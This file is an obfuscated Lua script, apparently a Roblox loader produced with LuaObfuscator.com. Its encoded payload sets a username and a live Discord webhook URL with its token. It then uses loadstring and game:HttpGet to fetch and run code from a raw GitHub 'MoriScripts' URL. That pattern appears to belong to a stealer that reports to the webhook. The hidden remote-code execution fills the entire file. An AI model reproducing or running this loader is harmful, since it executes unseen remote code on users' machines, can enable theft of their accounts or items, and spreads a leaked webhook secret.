--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v81,v19);v19=nil;v97=1;end end else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-((1 + 0) -0))) + 1)) ;return v82-(v82%(2 -1)) ;else local v83=619 -(555 + 64) ;local v84;while true do if (v83==(931 -(857 + 74))) then v84=2^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or ((877 -(282 + 595)) + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + (1274 -(226 + 1044)) ;return (v40 * (73054774 -56277558)) + (v39 * (65653 -(8 + 24 + 85))) + (v38 * (251 + 5)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=958 -(892 + 65) ;local v44=(v20(v42,1,1207 -(1069 + 118) ) * ((4 -2)^(58 -26))) + v41 ;local v45=v20(v42,38 -17 ,381 -(87 + 263) );local v46=((v20(v42,212 -(67 + 113) )==(1 + 0)) and  -(2 -1)) or (1 + 0) ;if (v45==(0 -0)) then if (v44==0) then return v46 * (952 -(802 + 150)) ;else v45=1;v43=(0 -0) -0 ;end elseif (v45==(3712 -1665)) then return ((v44==((0 -0) + 0)) and (v46 * ((998 -(915 + 82))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(596 + 427) ) * (v43 + (v44/(2^((12 + 56) -16)))) ;end local function v25(v47)local v48;if  not v47 then local v85=0 -0 ;while true do if (v85==(0 + 0)) then v47=v23();if (v47==(791 -(368 + 423))) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(3 -(7 -5)) );v18=v18 + v47 ;local v49={};for v63=19 -(10 + 8) , #v48 do v49[v63]=v2(v1(v3(v48,v63,v63)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;while true do local v65=1581 -(1535 + 46) ;while true do if (v65==(0 + 0)) then if (v50==(3 -0)) then local v94=0 + 0 ;while true do if (0~=v94) then else for v100=1475 -(1329 + 145) ,v23() do v52[v100-1 ]=v28();end return v54;end end end if ((0 + 0)==v50) then v51={};v52={};v53={};v50=972 -(140 + 831) ;end v65=561 -(306 + 254) ;end if (v65~=(1851 -(1409 + 441))) then else if (v50~=(719 -(15 + 703))) then else local v95=0;while true do if (v95~=(1 + 0)) then else v56={};v50=1469 -(899 + 568) ;break;end if (v95==(0 + 0)) then v54={v51,v52,nil,v53};v55=v23();v95=1 + 0 ;end end end if (v50==(8 -6)) then local v96=0 -0 ;while true do if (1==v96) then for v102=1207 -(696 + 510) ,v23() do local v103=0;local v104;while true do if (v103==(0 -0)) then v104=v21();if (v20(v104,1 + 0 ,1025 -(706 + 318) )~=(1251 -(721 + 530))) then else local v147=0 -0 ;local v148;local v149;local v150;local v151;local v152;while true do if (2==v147) then v152=nil;while true do if (v148~=(1262 -(1091 + 171))) then else v149=1271 -(945 + 326) ;v150=nil;v148=1;end if (v148~=2) then else while true do if (v149==(1 + 2)) then if (v20(v151,9 -6 ,9 -6 )~=1) then else v152[4 + 0 ]=v56[v152[378 -(123 + 251) ]];end v51[v102]=v152;break;end if (v149==1) then local v159=0;while true do if ((4 -3)~=v159) then else v149=700 -(208 + 490) ;break;end if (v159==(0 + 0)) then v152={v22(),v22(),nil,nil};if (v150==(202 -(14 + 188))) then local v166=675 -(534 + 141) ;local v167;local v168;while true do if (v166==(1288 -(993 + 295))) then v167=0;v168=nil;v166=1 + 0 ;end if (v166~=(1172 -(418 + 753))) then else while true do if (v167~=(0 + 0)) then else v168=0;while true do if (v168==0) then v152[3]=v22();v152[1 + 3 ]=v22();break;end end break;end end break;end end elseif (v150==1) then v152[3]=v23();elseif (v150==(1 + 1)) then v152[1 + 2 ]=v23() -(2^(15 + 1)) ;elseif (v150==(1772 -(1749 + 20))) then local v172=0 + 0 ;local v173;while true do if (v172~=(0 + 0)) then else v173=0 -0 ;while true do if (v173==0) then v152[3]=v23() -((1324 -(1249 + 73))^(25 -9)) ;v152[4]=v22();break;end end break;end end end v159=1146 -(466 + 679) ;end end end if (v149==(0 -0)) then local v160=0 + 0 ;while true do if (v160==(1 + 0)) then v149=2 -1 ;break;end if (v160==(396 -(115 + 281))) then local v165=0 -0 ;while true do if ((0 + 0)==v165) then v150=v20(v104,2,7 -4 );v151=v20(v104,14 -10 ,873 -(550 + 317) );v165=1 -0 ;end if (v165~=(1 + 0)) then else v160=1 -0 ;break;end end end end end if (v149~=(5 -3)) then else local v161=0;local v162;while true do if (0~=v161) then else v162=0 -0 ;while true do if (v162==(114 -(4 + 110))) then local v169=584 -(57 + 527) ;while true do if (v169==(286 -(134 + 151))) then v162=1666 -(970 + 695) ;break;end if (v169==(103 -(17 + 86))) then if (v20(v151,1 + 0 ,1 -0 )==(1 -0)) then v152[2]=v56[v152[1992 -(582 + 1408) ]];end if (v20(v151,6 -4 ,168 -(122 + 44) )~=(1 -0)) then else v152[9 -6 ]=v56[v152[11 -8 ]];end v169=1825 -(1195 + 629) ;end end end if (v162==(1 -0)) then v149=3;break;end end break;end end end end break;end if (v148==(1 -0)) then v151=nil;v152=nil;v148=67 -(30 + 35) ;end end break;end if ((241 -(187 + 54))==v147) then v148=780 -(162 + 618) ;v149=nil;v147=1 + 0 ;end if (v147==1) then v150=nil;v151=nil;v147=7 -5 ;end end end break;end end end v50=2 + 1 ;break;end if (v96==(1212 -(323 + 889))) then local v99=0 -0 ;while true do if (v99==1) then v96=1 -0 ;break;end if (v99~=(0 -0)) then else for v126=1 + 0 ,v55 do local v127=0;local v128;local v129;local v130;while true do if (v127~=(321 -(53 + 267))) then else v130=nil;while true do if (v128==(1 + 0)) then if (v129==(1637 -(1373 + 263))) then v130=v21()~=(1000 -(451 + 549)) ;elseif (v129==(415 -(15 + 398))) then v130=v24();elseif (v129==3) then v130=v25();end v56[v126]=v130;break;end if (v128~=0) then else local v156=0 + 0 ;while true do if (v156==1) then v128=3 -2 ;break;end if (v156==(0 -0)) then local v157=0;while true do if (v157~=(1 -0)) then else v156=1;break;end if (v157~=(1384 -(746 + 638))) then else v129=v21();v130=nil;v157=1;end end end end end end break;end if (v127==(0 + 0)) then v128=850 -(20 + 830) ;v129=nil;v127=1;end end end v54[3]=v21();v99=1 -0 ;end end end end end break;end end end end local function v29(v57,v58,v59)local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...)local v66=v60;local v67=v61;local v68=v62;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v86=0,v74 do if (v86>=v68) then v72[v86-v68 ]=v73[v86 + 1 ];else v76[v86]=v73[v86 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v87=0;while true do if (v87==0) then v78=v66[v70];v79=v78[1];v87=1;end if (1==v87) then if (v79<=4) then if (v79<=1) then if (v79>0) then local v105;local v106;v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v59[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v59[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v59[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v59[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v59[v78[3]];v70=v70 + 1 ;v78=v66[v70];v106=v78[2];v105=v76[v78[3]];v76[v106 + 1 ]=v105;v76[v106]=v105[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];else do return;end end elseif (v79<=2) then local v116=0;local v117;while true do if (v116==0) then v117=v78[2];v76[v117]=v76[v117](v13(v76,v117 + 1 ,v71));break;end end elseif (v79>3) then local v131=v78[2];local v132,v133=v69(v76[v131](v13(v76,v131 + 1 ,v78[3])));v71=(v133 + v131) -1 ;local v134=0;for v140=v131,v71 do local v141=0;while true do if (0==v141) then v134=v134 + 1 ;v76[v140]=v132[v134];break;end end end else v76[v78[2]]=v78[3];end elseif (v79<=6) then if (v79==5) then v76[v78[2]]=v59[v78[3]];else v59[v78[3]]=v76[v78[2]];end elseif (v79<=7) then local v122=0;local v123;local v124;while true do if (v122==0) then v123=v78[2];v124=v76[v78[3]];v122=1;end if (v122==1) then v76[v123 + 1 ]=v124;v76[v123]=v124[v78[4]];break;end end elseif (v79>8) then v76[v78[2]]=v78[3]~=0 ;else v76[v78[2]]();end v70=v70 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365724E616D6503083O00395348574957484503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130372O3233373438313532363832393037362F677A4554524B75575F572D634F78377A3564556D6F3268664B4C422D6C74367771385267456B304761757265344A576C496450683343666A766C7442766A68316434684D03093O00557365724E616D6532030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O0012013O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0009000400014O0004000100044O00025O00022O00083O000100016O00017O00",v9(),...);
